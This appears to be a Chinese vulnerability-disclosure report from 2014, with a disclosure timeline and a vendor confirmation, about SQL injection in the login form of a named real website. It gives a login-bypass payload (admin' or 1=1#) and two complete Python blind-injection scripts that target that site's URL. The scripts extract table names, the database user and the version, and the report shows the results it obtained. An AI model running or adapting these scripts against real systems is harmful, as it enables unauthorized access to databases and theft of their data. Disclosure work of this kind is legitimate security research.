2014-12-24: 细节已通知厂商并且等待厂商处理中 2014-12-26: 厂商已经确认,细节仅向厂商公开 2015-01-05: 细节向核心白帽子及相关领域专家公开 2015-01-15: 细节向普通白帽子公开 2015-01-25: 细节向实习白帽子公开 2015-02-07: 细节向公众公开
http://cmccsh.wiwide.com/login 登陆处万能密码登陆,存在sql盲注admin' or 1=1#失败时:
正确时:
脚本中跑到结果:user; root@localhostversion: 5.5.37database: adsads的第一个表:ad_day貌似只有一个表count了一下大约10000条数据,没有写进一步的脚本
注入数据表的脚本
#coding: utf-8#date: 2014/12/18import requestsimport sysimport timedef blind_inject(): payloads = 'rotabcdefghijklmnpqsuvwxyz0123456789@_.' user = '' end = 0 for i in range(1,40): if end == 1: break for j in payloads: time.sleep(1) headers ={ 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Origin': 'http://cmccsh.wiwide.com/login', 'User-Agent': 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Content-Type': 'application/x-www-form-urlencoded', 'Referer': 'http://cmccsh.wiwide.com/login', 'Accept-Encoding': 'gzip,deflate,sdch', 'Accept-Language': 'zh-CN,zh;q=0.8', 'Cookie': 'JSESSIONID=aBBzLjv2g4je', } exp = "or ( select (select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema=0x616473 limit 0,1)=%d)"%(i,ord(j)) url = "http://cmccsh.wiwide.com/login" data = "username=admin' %s #&pwd=1&login=1"%(exp) mark = 1 r = requests.post(url, data, headers=headers, allow_redirects=False) find = (len(r.text)<10) while r.status_code !=200 and find == False: r = requests.get(url) if find: user = user+j print '\n[*]Guessing ' + user, #print data #print r.text time.sleep(1) break else: print '.', if not user[::-1].startswith(j): end = 1 print '\n',userdef run(): blind_inject()if __name__ == '__main__': run()
注入user、version、database的脚本
#coding: utf-8#date: 2014/12/18import requestsimport sysimport timedef blind_inject(): payloads = 'rotabcdefghijklmnpqsuvwxyz0123456789@_.' user = '' end = 0 for i in range(1,40): if end == 1: break for j in payloads: time.sleep(1) headers ={ 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Origin': 'http://cmccsh.wiwide.com/login', 'User-Agent': 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Content-Type': 'application/x-www-form-urlencoded', 'Referer': 'http://cmccsh.wiwide.com/login', 'Accept-Encoding': 'gzip,deflate,sdch', 'Accept-Language': 'zh-CN,zh;q=0.8', 'Cookie': 'JSESSIONID=aBBzLjv2g4je', } exp = "or ascii(MID(lower(version()),%d,1))= %s"%(i,ord(j)) url = "http://cmccsh.wiwide.com/login" data = "username=admin' %s #&pwd=1&login=1"%(exp) mark = 1 r = requests.post(url, data, headers=headers, allow_redirects=False) find = (len(r.text)<10) while r.status_code !=200 and find == False: r = requests.get(url) if find: user = user+j print '\n[*]Guessing ' + user, #print data #print r.text time.sleep(1) break else: print '.', if not user[::-1].startswith(j): end = 1 print '\n',userdef run(): blind_inject()if __name__ == '__main__': run()
危害等级:中
漏洞Rank:10
确认时间:2014-12-26 18:17
问题已经确认,多谢白帽子的反馈!
暂无